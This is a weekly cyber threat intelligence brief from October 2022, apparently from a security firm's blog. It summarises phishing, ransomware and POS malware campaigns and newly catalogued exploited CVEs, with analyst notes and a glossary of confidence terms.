Cyber Intel Brief: Oct 20 – 26, 2022


Student Emails Used to Send Phishing Emails

Impacted Industries: Educational Services; Professional, Scientific, and Technical Services; potentially all

What You Need To Know:

Avanan, an email security provider, observed a threat actor who compromised an Arizona-based university student’s email account, sending numerous phishing link emails to various organizations. The email masquerades as a “Messages Blocked” warning with a “Release messages” “Call to Action” button that redirects the recipient to a credential harvesting phishing page.

Analyst Note: Several factors could have contributed to the email bypassing security solutions: using a legitimate email address, and VirusTotal only listing two security vendors flagging the phishing website as malicious. As for the student’s email account getting compromised: they could have fallen victim to a phishing email, likely had poor passwords, and likely didn’t have MFA enabled on their accounts.


TTPs and Observables for a Healthcare Ransomware Group Revealed

Impacted Industries: Health Care and Social Assistance

What You Need To Know:

CISA released a joint Cybersecurity Advisory that includes recently and historically observed TTPs and observables for a ransomware and data extortion group that actively targets the healthcare and social assistance sectors. In one incident detailed in the advisory, the threat actor (TA) likely exploited an unpatched vulnerability in a VPN server and acquired the compromised credentials for a VPN server, which did not have MFA enabled, through a phishing email with a malicious attachment.

Analyst Note: The advisory does not detail TTPs for data exfiltration, but according to a HIPPA Journal article, the threat actors claimed responsibility for the data breach of the Fitzgibbons Hospital in Marshall, MO, and exfiltrated 40GB of data, including data from MEDITECH and internal servers.


LV Ransomware Incident Analysis

Impacted Industries: Manufacturing, Information, Retail, and Professional, Scientific, and Technical Services

What You Need To Know:

An LV ransomware threat actor compromised a Jordanian organization by exploiting ProxyShell vulnerable Microsoft Exchange servers in early September. The affiliate used Powershell, Mimikatz, NetScan, Advanced Port Scanner, and RDP in the attack. According to open-source reporting, the threat actor has targeted organizations globally in the manufacturing, information, retail trade, and professional, scientific, and technical services sectors.

Analyst Note: The threat actor’s use of several open-source tools and execution of PowerShell code and scripts suggest the organization may not have had the proper monitoring and alerting. According to open-source reporting, the threat actor has targeted organizations in the manufacturing, information, retail trade, and professional, scientific, and technical services sectors.


DEV-0832 (Vice Society) Ransomware TTP Analysis

Impacted Industries: Educational Services, Retail Trade, and Public Administration

What You Need To Know:

Microsoft has detected active ransomware and extortion campaigns impacting the US educational services sector by a ransomware affiliate. The threat actor has shifted ransomware payloads over time, previously using various ransomware-as-a-service variants. Their latest payload is a variant of the publicly available Zeppelin ransomware. The affiliate relies on common TTPs, including PowerShell scripts, legitimate tools, exploiting vulnerabilities for initial access and post-compromise elevation of privilege, and commodity backdoors.

Analyst Note: The initial access vector is unknown, but according to open-source reporting, the threat actor has exploited vulnerable internet-exposed web applications and targeted organizations in the educational services, retail trade, and public administration sectors.


Over 161,000 Credit Cards Stolen in POS Malware Campaign

Impacted Industries: Retail Trade

What You Need To Know:

A still-active C2 server analyzed by Group-IB reveals that threat actors have stolen 161,866 US bank-issued payment records. Most infected devices are in Texas, Illinois, Missouri, Florida, and California. The C2 server analyzed by Group-IB housed admin panels for two POS malware families, MajikPOS and Treasure Hunter.

Analyst Note: Although recent trends show a switch to eCommerce retailers to gather payment card data, this discovery indicates that POS malware still threatens retail organizations. Despite not knowing how the devices were compromised, typical MajikPOS infections begin with scanning for open and poorly secured Virtual Network Computing and RDP or from initial access brokers.

Exploited Vulnerabilities

CISA Adds 9 CVEs to its Known Exploited Vulnerabilities Catalog

Impacted Industries: All

What You Need To Know:

Based on the evidence of active exploitation, CISA has added nine vulnerabilities to its Known Exploited Vulnerabilities Catalog. Some software affected includes GIGABYTE, Zimbra Collaboration, Cisco AnyConnect, and Apple iOS and iPadOS. The vulnerabilities added this week could allow a threat actor to take complete control, perform arbitrary code execution, DLL hijacking, or elevate privileges.

Analyst Note: Open-source reporting shows that exploiting publicly-facing applications is one of the top initial infection vectors. Threat actors used CVEs 2020-3153 and 2020-3433 in Linux ransomware incidents against Russian organizations, two ransomware variants incorporated exploits for CVE-2018-19320, and little information regarding the exploitation attempts of the other CVEs exists.

What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like “might” reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.


LinkedIn Twitter YouTube

Subscribe to the Deepwatch Insights Blog